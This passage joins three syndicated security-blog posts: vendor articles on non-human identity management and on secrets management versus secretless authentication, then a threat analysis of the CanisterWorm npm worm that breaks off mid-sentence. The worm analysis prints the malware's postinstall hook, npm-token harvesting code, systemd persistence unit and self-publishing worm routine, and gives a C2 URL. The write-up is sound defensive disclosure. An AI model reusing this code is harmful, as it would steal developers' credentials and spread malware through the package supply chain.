lack of visibility into the sprawling web of machine identities. Without a centralized platform, it’s easy for machine identities to fall through the cracks, leaving organizations vulnerable to attacks.</p><p>Another challenge is managing the lifecycle of NHIs. From the time a secret is created to its eventual decommissioning, each stage requires meticulous management to ensure security. Automating this lifecycle can help address common pitfalls such as expired credentials or unauthorized access.</p><p>Lastly, the gap between security teams and R&amp;D can hinder effective NHI management. Bridging this gap through a unified approach allows for better collaboration and understanding of the security needs throughout the development process.</p><h3>Enhancing Value Delivery Through Context-Aware Security</h3><p>To fully realize the potential value of an NHI system, organizations must focus on context-aware security. This involves gaining insights into ownership, permissions, usage patterns, and potential vulnerabilities. By understanding the context in which machine identities are used, organizations can better tailor their security strategies to meet specific needs.</p><p>A context-aware approach not only enhances security but also boosts operational efficiency. Security teams can allocate resources more effectively, focusing on high-priority threats. This shift from a reactive to a proactive security posture delivers significant value by increasing resilience against cyber threats.</p><p>Where NHIs play an increasingly pivotal role in ensuring system integrity, organizations must evaluate whether their existing strategies deliver the essential value needed to safeguard their operations.</p><p>By understanding the strategic importance of Non-Human Identity management, companies can better protect themselves from emerging threats and optimize their cybersecurity efforts. It is not merely about compliance or ticking off a checklist; it’s about building a robust defense mechanism that evolves with the complexity of modern digital infrastructures.</p><p>With cybersecurity continues to evolve, the focus on NHIs will only grow in relevance, making it imperative for organizations to adopt a strategic, comprehensive approach that emphasizes context-aware security and lifecycle management. The question is, can your business afford to overlook this critical component of cybersecurity?</p><p>For more insights into future cybersecurity trends, <a href="https://entro.security/blog/cybersecurity-predictions-2025/" rel="noopener">click here</a>.</p><h3>Exploring Best Practices in NHI Management</h3><p>Have you ever considered how many machine identities are circulating within your organization’s digital framework, functioning unnoticed yet critically important? The effective management of these NHIs could often mean the difference between a formidable cybersecurity posture and a vulnerable network. Establishing best practices is essential for optimizing NHI management and securing these machine identities efficiently.</p><ul> <li><strong>Comprehensive Discovery and Classification:</strong> The first step is understanding your environment. Organizations must conduct thorough audits to identify all machines and their respective identities. This not only facilitates easy classification of NHIs but also enables immediate spotting of unauthorized or rogue entities.</li> <li><strong>Regular Secret Rotation:</strong> Just like passports and visas have expiration dates, so should secrets. Implementing regular secret rotation policies minimizes the risk of unauthorized access due to outdated or compromised credentials. Automation tools can be utilized to streamline this process, ensuring consistency and minimizing the burden on IT staff.</li> <li><strong>Effective Policy Enforcements:</strong> Establish clear-cut policies regarding access control and permissions. Using tools that can enforce these policies helps maintain strict boundaries around what machine identities can and cannot do.</li> <li><strong>Continuous Monitoring and Auditing:</strong> Implement robust systems for continuous monitoring and auditing of NHIs. Detecting anomalies early is crucial to thwart potential security breaches. Modern AI and machine learning tools are instrumental in analyzing patterns and detecting deviations indicative of security threats.</li> </ul><h3>Technological Transformations and NHI Management</h3><p>How does the perpetual wave of technological advancements shape the field of NHI management? Where industries strive to adapt and harness new technologies, their approach to cybersecurity, especially concerning NHIs, must evolve concurrently.</p><p>Advancements in cloud computing, for instance, have revolutionized how organizations manage data and applications. However, this shift necessitates smarter strategies for managing machine identities. Given that cloud environments operate at different scales, often distributed across multiple locations, organizations must adopt NHI management solutions adept at handling a variety of environments seamlessly.</p><p>Additionally, the rise of artificial intelligence and machine learning comes as a double-edged sword. While AI can greatly enhance security analytics and automations within NHI management, it also introduces new targets for cyber threats. Thus, organizations must be vigilant in securing their AI systems, ensuring that machine learning models and data sets are protected and validated continuously.</p><h3>Industry Insights and the Path to Secure NHIs</h3><p>What impact do industry benchmarks and insights have on shaping robust NHI strategies? Industry examples can offer valuable insights into evolving best practices and technological adoptions.</p><p>For instance, the financial services industry has led the charge in integrating AI-driven analytics to oversee NHIs effectively. By leveraging sophisticated algorithms, these organizations extract crucial insights into user behaviors and detect proactive measures before potential breaches occur. These technologies have also been employed successfully in combating fraudulent activities, a persistent issue that consistently challenges the sector.</p><p>In contrast, the healthcare industry faces its own unique challenges. The sensitivity of healthcare data makes these systems attractive targets for cyber criminals. By adopting a zero-trust approach, requiring all users and devices to authenticate before accessing sensitive data, healthcare organizations can better manage NHIs and protect patient privacy in compliance with regulations. For healthcare entities, aligning NHI management strategies with policy-driven frameworks like <a href="https://entro.security/blog/secrets-security-and-soc2-compliance/">SOC 2 compliance</a> acts as a crucial component of their risk management strategy.</p><h3>Collaboration for Enhanced Cybersecurity</h3><p>How important is collaboration in enhancing cybersecurity practices around NHIs? Beyond individual organizations, the broader cybersecurity community plays a crucial role in promoting awareness and implementing solutions to manage NHIs effectively.</p><p>Collaborative platforms encourage the sharing of threat intelligence, allowing entities to learn from each other’s experiences and counter similar threats preemptively. Organizations that actively participate in industry consortiums focused on cybersecurity can gain powerful insights into emerging threats, vulnerabilities, and most importantly, innovative solutions used globally.</p><p>Developing partnerships across industries can also facilitate resource sharing, provide access to specialized expertise, and open pathways for comprehensive risk mitigation strategies. Bridging the gap between diverse security communities ensures the harmonious integration of solutions that address the peculiarities of various sectors, leading to a more unified, secure cyberspace.</p><p>When organizations continue to navigate complexities of technologically advanced, investing in NHI management should be a strategic imperative, not an afterthought. Cybersecurity experts who understand intricate machine identities operate within can more effectively build frameworks that sustain and protect critical infrastructures.</p><p>The post <a href="https://entro.security/does-your-nhi-system-deliver-essential-value/">Does your NHI system deliver essential value</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/does-your-nhi-system-deliver-essential-value/" data-a2a-title="Does your NHI system deliver essential value"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdoes-your-nhi-system-deliver-essential-value%2F&amp;linkname=Does%20your%20NHI%20system%20deliver%20essential%20value" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdoes-your-nhi-system-deliver-essential-value%2F&amp;linkname=Does%20your%20NHI%20system%20deliver%20essential%20value" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdoes-your-nhi-system-deliver-essential-value%2F&amp;linkname=Does%20your%20NHI%20system%20deliver%20essential%20value" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdoes-your-nhi-system-deliver-essential-value%2F&amp;linkname=Does%20your%20NHI%20system%20deliver%20essential%20value" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdoes-your-nhi-system-deliver-essential-value%2F&amp;linkname=Does%20your%20NHI%20system%20deliver%20essential%20value" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/does-your-nhi-system-deliver-essential-value/">https://entro.security/does-your-nhi-system-deliver-essential-value/</a> </p>

<div data-elementor-type="wp-post" data-elementor-id="56394" class="elementor elementor-56394" data-elementor-post-type="post"> <div class="elementor-element elementor-element-1a6f5fe2 e-flex e-con-boxed e-con e-parent" data-id="1a6f5fe2" data-element_type="container" data-e-type="container"> <div class="e-con-inner"> <div class="elementor-element elementor-element-226716a5 elementor-widget elementor-widget-text-editor" data-id="226716a5" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Most organizations still treat credentials as something that must be protected, stored, and rotated. But a second model is quietly reshaping how machine authentication works: eliminate static secrets altogether and authenticate workloads using identity and <a href="https://aembit.io/blog/jit-access-workloads-eliminating-standing-privileges/">just-in-time access</a>. These two approaches represent different philosophies, different operational realities, and different long-term costs.</p> <p>It also isn’t a binary choice. Most organizations run a mix of modern cloud workloads, legacy systems, SaaS APIs, and <a href="https://aembit.io/blog/securing-ci-cd-pipelines-the-role-of-workload-identity-federation/">CI/CD pipelines</a>. Some of those environments support <a href="https://aembit.io/blog/securing-ai-agents-without-secrets/">secretless authentication</a> today, while others will always require a secrets manager. Understanding where each model fits, not picking a side, is the real strategic decision.</p> <h2>1. Two Security Philosophies, Explained Simply</h2> <p>Secrets management assumes <a href="https://aembit.io/blog/static-credentials-in-cloud-native-environments/">static credentials</a> are a fundamental part of your architecture. Its job is to store those credentials centrally, protect them, and rotate them regularly. Eliminating secrets takes the opposite view. It assumes static credentials are the root of the problem and removes them from the authentication path entirely by issuing short-lived credentials on demand.</p> <p>These philosophies produce two very different security and operational models.</p> <h3>Secrets Management</h3> <p>Secrets management exists to make static credentials as safe as they can be. It stores them in secure vaults, enforces access controls, rotates them on schedules, and provides auditing for compliance. When done well, it prevents hardcoded credentials, reduces the risk of accidental exposure, and protects legacy systems that cannot authenticate any other way.</p> <p>This model works because it accepts the premise that long-lived credentials will exist and need to be guarded.</p> <h3>Secrets Elimination</h3> <p>Secrets elimination does not protect static credentials; it removes them. Workloads authenticate using their identity, not a password or API key. After identity is verified, a short-lived credential is issued for that specific task and expires quickly after use. No static credential sits around waiting to be stolen.</p> <p>Different platforms use different mechanisms to validate identity. Cloud IAM systems often rely on built-in workload identities. Some modern identity platforms, including <a href="https://aembit.io/">Aembit</a>, use cryptographic attestation to verify the workload and its environment before issuing access. <a href="https://aembit.io/glossary/Attestation/">Attestation</a> is one method, not a universal requirement for all secretless systems.</p> <p>By removing static credentials from the ecosystem, the entire attack surface changes. But organizations must have the identity infrastructure in place to support this approach.</p> <h2>2. It’s Not Either/Or: Where Each Model Fits</h2> <p>Choosing between secrets management and secretless authentication is rarely an all-or-nothing decision. Each approach works best for specific types of credentials.</p> <h3>When Secrets Management Is the Right Tool</h3> <p>Some credentials inherently require a secrets manager because no identity-based integration exists:</p> <ul> <li><a href="https://aembit.io/glossary/API-key/">API keys</a> for SaaS providers</li> <li>Legacy databases using static passwords</li> <li>SSH keys and break-glass emergency access</li> <li>Third-party services that only support long-lived secrets</li> </ul> <p>In these situations, storing and rotating secrets centrally is still the most secure and operationally predictable option.</p> <h3>When Secretless Authentication Is the Better Fit</h3> <p>Secretless authentication shines in cloud-native and automated environments where workloads already have identity primitives:</p> <ul> <li>Service-to-service authentication within clouds</li> <li>Kubernetes workloads using service accounts or token projection</li> <li>CI/CD pipelines that can federate identity</li> <li>Multi-cloud APIs that accept identity tokens through OAuth or OIDC</li> </ul> <p>In these environments, static credentials add operational burden without providing additional security value. AI agents add urgency to this shift. Agentic AI workloads spin up dynamically, call multiple APIs per task, and operate across trust boundaries that change by the minute, making static credentials both impractical and dangerous at that scale.</p> <h3>Most Organizations Land in a Hybrid Model</h3> <p>A hybrid model, secretless for modern workloads, secrets management for legacy or external systems, is how most enterprises will operate for years. Secretless authentication reduces the number of secrets you must protect, while secrets management ensures the remaining ones are governed consistently.</p> <p>Surface area shrinks. Risk shrinks. Operational overhead shrinks. But compatibility is maintained.</p> <h2>3. Capabilities and Limitations of Both Models</h2> <p>Secrets management is strongest when static credentials are unavoidable. It centralizes storage, enforces access controls, automates rotation, and creates the audit trails regulators expect. These capabilities reduce exposure from hardcoded credentials and support legacy systems that cannot authenticate using identity-based methods.</p> <p>Its limitations, however, stem from the nature of static credentials themselves. Applications still need a bootstrap credential to reach the vault, leaving the <a href="https://aembit.io/use-case/solving-the-secret-zero-problem/">secret-zero problem</a> unresolved. Credentials remain viable targets for attackers until rotated. Rotation introduces operational complexity, and vault availability becomes a dependency for every downstream service. As the environment grows, the number of secrets grows with it, increasing management overhead.</p> <p>Secretless authentication addresses those weaknesses by removing static credentials from the ecosystem. Workloads authenticate using identity, receive short-lived and narrowly scoped credentials, and operate without storing anything long-lived. This dramatically reduces the blast radius of a compromise and simplifies the developer experience by eliminating credential-handling code. Policies can be enforced in real time across clouds and pipelines.</p> <p>Secretless models bring their own constraints. They rely on uninterrupted identity infrastructure, require precise policy definitions, and are not yet supported by all systems, especially SaaS APIs and legacy databases that still depend on static keys. Some workloads may need refactoring to participate in identity-based authentication. In short, secretless reduces risk but increases reliance on modern identity foundations.</p> <h2>4. Operational Realities: What Teams Experience Daily</h2> <p>Both approaches promise to simplify security, but they shift where the complexity sits.</p> <h3>Developer Experience</h3> <p>With secrets management, developers write credential-fetching logic, handle rotation failures, and maintain separate configurations for every environment. Pipelines frequently break when a credential expires. New microservices require credential provisioning before any feature work begins.</p> <p>With secretless authentication, developers write no authentication code. The platform injects valid credentials at runtime or uses brokered identity-based access. Deployments no longer trigger credential updates, and rotation is invisible to developers.</p> <h3>Operations and SRE</h3> <p>Secrets management creates ongoing operational overhead. Vault clusters must be maintained, HA must be ensured, rotation windows must be coordinated, and every added service increases administrative complexity.</p> <p>Secretless platforms shift work from reactive credential maintenance to proactive policy governance. There are fewer emergency rotations and fewer late-night credential outages, but higher reliance on identity services and policy planning.</p> <h3>Security and Compliance</h3> <p>Secrets management improves auditability but keeps credentials in scope. Logs focus on who accessed which secret and when it was rotated.</p> <p>Secretless authentication focuses audits on identity assertions, policy decisions, and runtime access patterns. Because fewer credentials exist, compliance reviews often focus on policy governance rather than credential hygiene.</p> <h2>5. Risk Posture: Two Very Different Models</h2> <p>Secrets management reduces but does not eliminate credential risk. Attackers target vault tokens, extract secrets from memory, scrape logs, or compromise CI/CD systems. Static credentials remain valid until the next rotation, giving attackers a broader window for exploitation.</p> <p>These risks compound as organizations deploy AI agents that autonomously call dozens of APIs, each requiring its own credentials. A single compromised agent with hardcoded keys doesn’t just expose one service; it exposes every service the agent can reach.</p> <p>Secretless authentication removes the static credential entirely. A compromised workload cannot reveal a password because none exists. The primary risks shift to identity infrastructure outages or policy misconfigurations. The blast radius typically shrinks to a single workload instance or session.</p> <p>Both models reduce different kinds of risk. Secrets management reduces surface area; secretless architectures change the surface entirely.</p> <h2>6. Cost Considerations</h2> <p>The financial differences between the two models become clear as environments scale.</p> <h3>Secrets Management Costs</h3> <ul> <li>Vault infrastructure, backups, and disaster recovery</li> <li>Ongoing administration for policy updates, monitoring, and rotation</li> <li>Developer time spent writing and maintaining credential plumbing</li> <li>Operational burden during large-scale emergency rotations</li> </ul> <h3>Secretless Authentication Costs</h3> <p>Most of the investment occurs upfront:</p> <ul> <li>Deploying workload identity or federation</li> <li>Modernizing applications that depend on static secrets</li> <li>Training teams on identity-first patterns</li> <li>Establishing centralized policy governance</li> </ul> <p>Over time, the cost curve flattens. Rotation disappears. Per-service onboarding becomes easier. And emergency credential resets become rare.</p> <h2>7. Compliance Considerations</h2> <p>Compliance frameworks heavily influence how organizations treat machine credentials, but their requirements have evolved significantly. PCI DSS 4.0’s Requirement 8.6.3, which became mandatory after March 31, 2025, requires that passwords and passphrases for application and system accounts be changed periodically, with the frequency determined by a targeted risk analysis. This replaced the older assumption of fixed quarterly rotation with a risk-based approach. Organizations must still rotate credentials for service accounts, API keys, and other nonhuman identities, but the cadence is now tied to assessed risk rather than a rigid calendar.</p> <p>This shift matters because it opens the door to smarter credential governance. Organizations that reduce the number of static credentials through secretless patterns have fewer credentials subject to 8.6.3’s rotation requirements in the first place. For the credentials that remain, risk-based rotation replaces blanket schedules, reducing operational burden. Moving toward identity-first access simplifies the compliance narrative further by replacing periodic rotation with continuous identity verification for modern workloads.</p> <p>Secretless authentication does not remove compliance obligations; it changes their shape. Instead of proving that a password was updated every 90 days, teams demonstrate that no static credential existed and that every access was tied to a verified workload identity.</p> <h2>8. A Practical Decision Framework</h2> <p>A clean way to decide where to invest is to evaluate four dimensions.</p> <h3>Infrastructure Maturity</h3> <ul> <li>Cloud-native architectures benefit most from secretless approaches.</li> <li>Legacy or monolithic environments will rely heavily on secrets management.</li> </ul> <h3>Risk Tolerance</h3> <ul> <li>Eliminating attack vectors provides transformational risk reduction.</li> <li>Some organizations prefer incremental improvements through better governance.</li> </ul> <h3>Compliance Requirements</h3> <ul> <li>Secretless architectures simplify some compliance narratives by removing persistent credentials.</li> <li>Secrets management offers mature, auditor-friendly trails for regulated environments.</li> </ul> <h3>Team Capability</h3> <ul> <li>Secretless adoption requires comfort with identity, policy, and workload security.</li> <li>Secrets management aligns with existing operational models.</li> </ul> <p>For most organizations, the correct strategy is phased adoption: start secretless where identity is strong and rely on secrets management everywhere else.</p> <h2>9. The Strategic Investment Decision</h2> <p>Secrets management and secrets elimination are not competing fads; they are two tools designed for two eras of architecture. Secrets management strengthens what already exists. Secretless authentication prepares teams for cloud-native, automated environments where workloads, not humans, drive the majority of access.</p> <p>The most resilient organizations combine both: reduce secrets wherever possible, manage the unavoidable ones securely, and move steadily toward identity-backed, just-in-time access.</p> <p><a href="https://aembit.io/product-overview/">Aembit’s Workload IAM platform</a> enables this transition by providing identity federation, policy-based access control, and secretless authentication for modern workloads while coexisting with the secrets managers you already use.</p> <h2>Related Reading</h2> <ul> <li><a href="https://aembit.io/blog/solving-the-secret-zero-problem-with-workload-identity/">Solving the Secret Zero Problem with Workload Identity</a></li> <li><a href="https://aembit.io/blog/attestation-based-identity-hardware-cloud-security/">Attestation-Based Identity: How It Works and Why It Matters</a></li> <li><a href="https://aembit.io/blog/future-of-secrets-management-in-the-era-of-agentic-ai/">The Future of Secrets Management in the Era of Agentic AI</a></li> <li><a href="https://aembit.io/blog/key-management-solutions-for-non-human-identities-in-the-cloud/">Key Management Solutions for Non-Human Identities</a></li> <li><a href="https://aembit.io/blog/ci-cd-security-checklist-eliminate-secrets-workload-identity/">CI/CD Security Checklist: Secure Pipelines &amp; Eliminate Secrets</a></li> </ul></div> </div> </div> </div> </div><p>The post <a href="https://aembit.io/blog/secrets-management-vs-elimination/">Secrets Management vs. Secrets Elimination: Where Should You Invest?</a> appeared first on <a href="https://aembit.io/">Aembit</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/secrets-management-vs-secrets-elimination-where-should-you-invest/" data-a2a-title="Secrets Management vs. Secrets Elimination: Where Should You Invest?"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecrets-management-vs-secrets-elimination-where-should-you-invest%2F&amp;linkname=Secrets%20Management%20vs.%20Secrets%20Elimination%3A%20Where%20Should%20You%20Invest%3F" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecrets-management-vs-secrets-elimination-where-should-you-invest%2F&amp;linkname=Secrets%20Management%20vs.%20Secrets%20Elimination%3A%20Where%20Should%20You%20Invest%3F" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecrets-management-vs-secrets-elimination-where-should-you-invest%2F&amp;linkname=Secrets%20Management%20vs.%20Secrets%20Elimination%3A%20Where%20Should%20You%20Invest%3F" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecrets-management-vs-secrets-elimination-where-should-you-invest%2F&amp;linkname=Secrets%20Management%20vs.%20Secrets%20Elimination%3A%20Where%20Should%20You%20Invest%3F" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecrets-management-vs-secrets-elimination-where-should-you-invest%2F&amp;linkname=Secrets%20Management%20vs.%20Secrets%20Elimination%3A%20Where%20Should%20You%20Invest%3F" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://aembit.io/">Aembit</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Dan Kaplan">Dan Kaplan</a>. Read the original post at: <a href="https://aembit.io/blog/secrets-management-vs-elimination/">https://aembit.io/blog/secrets-management-vs-elimination/</a> </p>

<p>On March 20, 2026 at 20:45 UTC, <a href="https://www.aikido.dev/blog/teampcp-deploys-worm-npm-trivy-compromise" rel="noopener">Aikido</a> Security detected an unusual pattern across the npm registry: dozens of packages from multiple organizations were receiving unauthorized patch updates, all containing the same hidden malicious code. What they had caught was CanisterWorm, a self-spreading npm worm deployed by the threat actor group TeamPCP.</p><p>We track this incident as <strong>MSC-2026-3271.</strong></p><p>CanisterWorm is explicitly designed to target <strong>Linux systems</strong>. Once installed, it plants a persistent backdoor that survives reboots using systemd, the standard Linux service manager, and connects to a command-and-control server built on the Internet Computer Protocol (ICP), a decentralized blockchain network. Because ICP has no single host or provider, the C2 infrastructure cannot be taken down through a conventional takedown request, making CanisterWorm the first publicly documented npm worm to use this technique.</p><p><strong>Important:</strong> While the persistent backdoor is Linux-only, the credential theft (Stage 1) and worm propagation (Stage 4) components execute on any platform. npm tokens on macOS and Windows machines are equally at risk of theft and abuse.<br>The worm affected <a href="https://docs.google.com/spreadsheets/d/1LO8vC1cl_1Ho4gr3msqvYT9C1AeZ_GaCFj2U-nzCLE0/edit?gid=1764127214#gid=1764127214" rel="noopener">more than 50 packages</a> across multiple npm scopes, including <code>@EmilGroup , @opengov , @teale.io/eslint-config, @airtm/uuid-base32</code>, and <code>@pypestream/floating-ui-dom</code>. Any developer or CI/CD pipeline that installed one of these packages also had its own npm credentials stolen and potentially used to spread the worm further through their own packages.</p><p>This post covers a technical breakdown of the attack, including the malware behavior, attribution to the threat actor, and some IOC’s.</p><h2 class="wp-block-heading" id="background-how-teampcp-got-the-keys">Background: How TeamPCP Got the Keys</h2><p>CanisterWorm did not begin with npm. The credentials that seeded the initial infection wave were stolen hours earlier through a separate, <a href="https://thehackernews.com/2026/03/trivy-security-scanner-github-actions.html" rel="noopener">high-impact supply chain attack</a> on Trivy, Aqua Security’s widely-used open-source vulnerability scanner.</p><p>TeamPCP exploited a GitHub Actions misconfiguration involving a <code>pull_request_target</code> workflow that exposed a Personal Access Token (PAT). Using that stolen token, the attacker force-pushed malicious commits over 75 of 76 version tags on <code>aquasecurity/trivy-action</code> and 7 tags on <code>aquasecurity/setup-trivy,</code> effectively replacing the legitimate scanner with a credential harvester across thousands of CI/CD pipelines that ran that day.</p><p>The Trivy payload operated in three stages: enumerate secrets from the environment and filesystem, encrypt them, and silently exfiltrate them. What it collected included SSH keys, AWS and cloud provider credentials, database passwords, Kubernetes tokens, Docker configs, and npm authentication tokens. Those npm tokens became the launch pad for CanisterWorm less than 24 hours later.</p><p>This cascading structure, where one compromised tool becomes the credential source for a second, broader attack, is what makes TeamPCP’s campaign notable beyond the individual techniques involved.</p><h2 class="wp-block-heading" id="technical-analysis-of-the-canisterworm">Technical Analysis of the CanisterWorm </h2><h3 class="wp-block-heading" id="stage-1-the-postinstall-hook-that-runs-on-every-install">Stage 1: The Postinstall Hook That Runs on Every Install</h3><p>When you run <code>npm install</code>, npm automatically runs any script defined in a package’s <code>postinstall</code> field before the install completes. CanisterWorm abuses this standard feature to execute malicious code on the developer’s machine or CI/CD runner without any additional action required.</p><p>The <code>postinstall</code> entry in compromised <code>package.json</code> files pointed to <code>index.js</code>, which is the worm’s first-stage loader.</p><pre class="wp-block-code"><code>{   "scripts": {     "postinstall": "node index.js",     "deploy": "node scripts/deploy.js"   }</code></pre><p>_{Figure 1: The <code>postinstall </code>trigger in compromised <code>package.json</code> files.}</p><p>The first thing <code>index.js</code> does is collect every npm authentication token it can find on the machine. It checks three places: <code>.npmrc</code> configuration files (in the home directory, current directory, and <code>/etc/npmrc</code>), environment variables matching patterns like <code>NPM_TOKEN</code> and <code>NPM_TOKENS,</code> and the live npm configuration via npm config get.</p><pre class="wp-block-code"><code>function findNpmTokens() { const tokens = new Set(); const homeDir = os.homedir(); const npmrcPaths = [ path.join(homeDir, '.npmrc'), path.join(process.cwd(), '.npmrc'), '/etc/npmrc', ]; for (const rcPath of npmrcPaths) { try { const content = fs.readFileSync(rcPath, 'utf8'); for (const line of content.split('\n')) { const m = line.match(/(?:_authToken\s*=\s*|:_authToken=)([^\s]+)/); if (m &amp;&amp; m[1] &amp;&amp; !m[1].startsWith('${')) tokens.add(m[1].trim()); } } catch (_) {} } } </code></pre><p>_{Figure 2: npm token harvesting searches <code>.npmrc</code> files, environment variables, and live npm config<br>}</p><h3 class="wp-block-heading" id="stage-2-the-persistent-python-backdoor-that-survives-reboots">Stage 2: The Persistent Python Backdoor That Survives Reboots</h3><p>Once <code>index.js</code> has collected tokens, it installs a persistent backdoor on the host. </p><p>The loader decodes a base64-encoded Python script embedded in the package and writes it to <code>~/.local/share/pgmon/service.py.</code> It then creates a systemd user service (a standard Linux mechanism for running background processes) at <code>~/.config/systemd/user/pgmon.service</code> and immediately enables and starts it. This requires no administrator (root) access, which makes it harder to detect.</p><p>The name <code>pgmon</code> is intentional: it is designed to look like a PostgreSQL monitoring tool to anyone inspecting running services.</p><pre class="wp-block-code"><code>fs.writeFileSync(unitFilePath, [ '[Unit]', `Description=${SERVICE_NAME}`, 'After=default.target', '', '[Service]', 'Type=simple', `ExecStart=/usr/bin/python3 ${scriptPath}`, 'Restart=always', 'RestartSec=5', '', '[Install]', 'WantedBy=default.target', ].join('\n'), { mode: 0o644 }); execSync('systemctl --user daemon-reload', { stdio: 'pipe' }); execSync(`systemctl --user enable ${SERVICE_NAME}.service`, { stdio: 'pipe' }); execSync(`systemctl --user start ${SERVICE_NAME}.service`, { stdio: 'pipe' }); </code></pre><p>_{Figure 3: Systemd user service created by the loader for persistent backdoor execution}</p><p>The Python backdoor itself implements several techniques to avoid detection:</p><ul class="wp-block-list"> <li><strong>Sandbox evasion:</strong> It waits 5 minutes before doing anything on first run. Many automated malware analysis sandboxes time out before this delay expires.</li> <li><strong>Low-frequency polling:</strong> It only checks for new instructions every ~50 minutes (3,000 seconds), making it harder to spot in network traffic.</li> <li><strong>Browser impersonation:</strong> It spoofs a browser User-Agent header when making network requests.</li> <li><strong>State tracking:</strong> It stores the last-fetched payload URL in /tmp/.pg_state to avoid re-executing the same payload on repeated polls.</li> </ul><h3 class="wp-block-heading" id="stage-3-the-icp-canister-c2">Stage 3: The ICP Canister C2 </h3><p>This is where CanisterWorm breaks new ground. Rather than communicating with a conventional web server (which can be seized, blocked, or taken offline), the Python backdoor polls an ICP canister for its instructions.</p><p>ICP (Internet Computer Protocol) is a decentralized blockchain network. A “canister” is a piece of code deployed on that network that runs autonomously. There is no single company or host that controls it, and it cannot be taken down through a conventional hosting provider takedown request. This makes it significantly more resilient than traditional C2 infrastructure.</p><p>The canister exposes three methods: <code>get_latest_link</code> (retrieve the current payload URL), http_request (serve that URL to the backdoor), and <code>update_link</code> (let the attacker rotate to a new payload without touching the infected packages). This means TeamPCP can change what executes on infected machines at any time, without republishing any npm package.</p><ul class="wp-block-list"> <li><strong>Canister ID:</strong> tdtqy-oyaaa-aaaae-af2dq-cai</li> <li><strong>C2 URL:</strong> https://tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io/</li> </ul><p>The backdoor downloads the URL returned by the canister, saves the binary to <code>/tmp/pglog</code>, and executes it. The attacker built in a kill-switch: if the returned URL contains <code>youtube.com</code>, the backdoor skips execution. At the time of discovery, the canister was returning a YouTube link, meaning the final payload stage was dormant but fully operational infrastructure was in place across infected machines.</p><h3 class="wp-block-heading" id="stage-4-the-self-propagating-worm-component">Stage 4: The Self-Propagating Worm Component</h3><p>The <code>scripts/deploy.js</code> component is what transforms this from a credential-stealing backdoor into a worm. A worm spreads itself automatically. A developer who installs an infected package and has npm credentials on their machine becomes an unwitting spreader, infecting their own packages without any knowledge or action on their part.</p><p>deploy.js is launched as a completely detached background process after token harvesting. It then works through each stolen token:</p><ol class="wp-block-list"> <li>Authenticates with the npm registry to resolve the token’s associated username</li> <li>Queries the npm search API to enumerate every package that user has publish access to</li> <li>For each package, fetches the real README and latest published version from the registry</li> <li>Bumps the patch version number (e.g., 1.8.11 becomes 1.8.12)</li> <li>Temporarily overwrites the local package.json with the target package’s name and bumped version</li> <li>Publishes the entire worm package under the victim’s package name with –tag latest</li> <li>Restores the original package.json and README locally, leaving no obvious traces</li> </ol><pre class="wp-block-code"><code>async function deployWithToken(token, pkg, pkgPath, newVersion) { const whoami = await fetchJson('https://registry.npmjs.org/-/whoami', token); const username = whoami.username; const ownedPackages = await getOwnedPackages(username, token); for (const packageName of ownedPackages) { const { readme: remoteReadme, latestVersion } = await fetchPackageMeta(packageName, token); const publishVersion = latestVersion ? bumpPatch(latestVersion) : newVersion; const tempPkg = { ...pkg, name: packageName, version: publishVersion }; fs.writeFileSync(pkgPath, JSON.stringify(tempPkg, null, 2) + '\n', 'utf8'); run('npm publish --access public --tag latest', { env: { ...process.env, NPM_TOKEN: token }, }); fs.writeFileSync(pkgPath, originalPkgJson, 'utf8'); // restore } } </code></pre><p>_{Figure 4: Worm propagation publishes the malicious package under each victim’s owned package names}</p><p>Publishing with <code>--tag latest</code> means 